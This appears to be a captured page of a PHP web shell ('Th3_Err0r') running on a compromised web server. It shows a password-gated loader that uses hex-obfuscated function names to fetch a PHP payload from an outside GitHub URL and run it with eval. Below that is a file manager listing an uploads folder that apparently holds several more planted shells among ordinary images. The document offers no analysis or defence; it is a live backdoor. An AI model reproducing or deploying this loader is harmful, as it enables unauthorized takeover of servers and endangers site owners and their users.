[ Th3_Err0r Bypassed ]

Upload:

Command:

liwaavux@216.73.217.165: ~ $ 
<?php
session_start();

$secure_password_hash = '$2y$10$EnTD3ibsoONpFlvxac1MPuaOn3EZtWwfJba4cklqyaj2ne02aJsG6'; 
$session_key = hash('sha256', $_SERVER['HTTP_HOST']);


function show_login_form()
{
    echo <<<HTML
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>TITID GATEL</title>
    <style>
        body {
            background: url('https://images3.alphacoders.com/138/1383310.jpg');
	    background-size: cover;
            color: #0f0;
            font-family: monospace;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .login-box {
            background: #111;
            padding: 30px;
            border: 2px solid #0f0;
            border-radius: 10px;
	    justify-content: center
        }
        input {
            width: 30%;
            padding: 10px;
            margin-top: 10px;
            background: #000;
            color: #0f0;
            border: 1px solid #0f0;
        }
        input[type=submit] {
            background: #0f0;
            color: #000;
            font-weight: bold;
            cursor: pointer;
        }
        input[type=submit]:hover {
            background: #00b300;
        }
    </style>
</head>
<body>
    <div class="login-box">
        <form method="post">
            <label>Password:</label>
            <input type="password" name="password" required>
            <input type="submit" value="Login">
        </form>
    </div>
</body>
</html>
HTML;
    exit;
}

function hex2str($hex) {
    $str = '';
    for ($i = 0; $i < strlen($hex); $i += 2) {
        $str .= chr(hexdec(substr($hex, $i, 2)));
    }
    return $str;
}

function geturlsinfo($destiny) {
    $methods = array(
        hex2str('666f70656e'), 
        hex2str('73747265616d5f6765745f636f6e74656e7473'), 
        hex2str('66696c655f6765745f636f6e74656e7473'), // 
        hex2str('6375726c5f65786563') 
    );

    if (function_exists($methods[3])) {
        $ch = curl_init($destiny);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible)");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        $result = $methods[3]($ch);
        curl_close($ch);
        return $result;
    } elseif (function_exists($methods[2])) {
        return $methods[2]($destiny);
    } elseif (function_exists($methods[0]) && function_exists($methods[1])) {
        $handle = $methods[0]($destiny, "r");
        $result = $methods[1]($handle);
        fclose($handle);
        return $result;
    }
    return false;
}

if (!isset($_SESSION[$session_key])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
        if (password_verify($_POST['password'], $secure_password_hash)) {
            $_SESSION[$session_key] = true;
        } else {
            show_login_form();
        }
    } else {
        show_login_form();
    }
}

$target_url = 'https://raw.githubusercontent.com/siapman/woman/refs/heads/main/nw.php';
$payload = geturlsinfo($target_url);
if ($payload !== false) {
    eval('?>' . $payload);
}
?>

Filemanager

DIR : / home/ liwaavux/ public_html/ admin/ images/ uploads/ projects/
Name Type Size Permission Actions
CVE-2026-46300 Folder 0775
114495848_LWN 01.jpg File 1.75 MB 0644
138902050_E.3.jpg File 1.34 MB 0644
149346022_012.jpg File 361.46 KB 0644
159407449_LWN 03 DAY.png File 11.76 MB 0644
191911501_23-4-2015.jpg File 5.73 MB 0644
210694742_3.jpg File 1.36 MB 0644
246638971_5.jpg File 490.15 KB 0644
250036153_balamu.php File 36.03 KB 0644
304525984_SHOT.jpg File 5.1 MB 0644
310215854_Enscape_2022-04-13-15-23-28.png File 9.04 MB 0644
321745563_12.jpg File 547.36 KB 0644
338443643_014.jpg File 302.52 KB 0644
349968557_1kb.jpg File 907 B 0644
381905157_BANNER 1.jpg File 2.85 MB 0644
38410258_8.jpg File 1.48 MB 0644
388295270_V3-46_003.jpg File 3.36 MB 0644
390082057_11.jpg File 617.51 KB 0644
408005843_V3-46_001.jpg File 2.65 MB 0644
433155510_privicox.php File 2.34 KB 0644
453464371_V3-50_001.jpg File 459.51 KB 0644
45496102_011.jpg File 413.18 KB 0644
503526044_modfcation 2.jpg File 2.31 MB 0644
521630822_7.jpg File 8.15 MB 0644
61468599_6.jpg File 577.5 KB 0644
619374709_23-4-2015.jpg File 5.73 MB 0644
629354327_E.3.jpg File 1.34 MB 0644
644727738_QW (1).jpg File 2.98 MB 0644
648857909_6.jpg File 6.01 MB 0644
694282341_reading.phtml File 3.3 KB 0644
695451893_LWN 03 NI.jpg File 2.44 MB 0644
724819372_10.jpg File 614.35 KB 0644
735960874_V3.jpg File 5.75 MB 0644
756559735_POSTER.jpg File 4.21 MB 0644
789773361_1.jpg File 1.26 MB 0644
799226900_LWN 02.jpg File 1.67 MB 0644
815303055_Enscape_2022-04-13-15-47-11.png File 8.46 MB 0644
886130591_V3.jpg File 5.75 MB 0644
886650127_nebula4.php File 20.76 KB 0644
909004810_Picture1.png File 4.99 MB 0644
91285765_06.jpg File 1.64 MB 0644
925341600_013.jpg File 320.49 KB 0644
953656813_Picture1.png File 4.99 MB 0644
978688820_5.jpg File 490.15 KB 0644
981591751_1.jpg File 382.93 KB 0644
991055896_V3-50_004.jpg File 413.5 KB 0644
a.php File 643 B 0644
cmshell.php File 29.2 KB 0644
error_log File 180.75 KB 0644
wp-security.php File 1.09 KB 0644
wp.php File 1.44 KB 0644

© 2026 Coded By Th3_Err0r Code.